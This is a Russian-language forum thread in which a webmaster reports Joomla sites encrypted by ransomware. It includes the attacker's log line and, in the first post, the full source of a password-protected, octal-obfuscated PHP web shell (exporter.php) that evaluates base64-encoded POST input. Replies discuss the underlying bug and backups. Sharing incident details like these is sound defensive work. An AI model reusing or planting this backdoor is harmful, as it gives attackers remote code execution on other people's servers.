шифровальщик joomla

L

125

Logger

29 апреля 2016, 14:21

802

сейчас шифранули 2 сайта посредством php взлома joomla 3.4.8

срочно обновляйтесь до 3.5.1

восстановил из бекапа - расшифровать я думаю невозможно

лишних 450$ на каждый сайт нет )

шифранули запросом

95.78.162.131 - - [29/Apr/2016:15:08:43 +0300] "GET /libraries/joomla/exporter.php HTTP/1.0" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.2; rv:10.0) Gecko/20100101
Firefox/10.0"

ip 95.78.162.131 Chelyabinsk, Russia - наши хотят биткойнов

файл exporter.php 237 байт

<?php if (md5($_POST['password']) == 'a661027e1979a2219fb638e3cb048580') { preg_replace("\043\056\052\043\145", "\145\166\141\154\050\142\141\163\145\066\064\137\144\145\14
3\157\144\145\050'" . $_POST['code'] . "'\051\051\073", ''); } ?>

а то будет такое

[ATTACH]151440[/ATTACH]

png 11.png

Контакты-icq 535609 ()

K5

209

kgtu5

29 апреля 2016, 17:25

#1

однако устаревший баг

https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html

;)

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!

822

Andreyka

30 апреля 2016, 03:19

#2

Бекапы для слабаков?

Не стоит плодить сущности без необходимости

126

RAS

30 апреля 2016, 14:12

#3

Здесь только бэкап спасет, как подметили выше Андрейка. Хуцкеры прогрессируют, не стоят на месте.

Администрируем сервера, впс, вдс. Ускоряем загрузку сайтов - DLE, Word Press, Joomla, Modx... Настраиваем безопасность. Ручная чистка rootkit/malware/вирусов. (/ru/forum/867860) Разработка - shell/bash/sh/python/perl.

В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах

Что такое Power BI и зачем это нужно бизнесу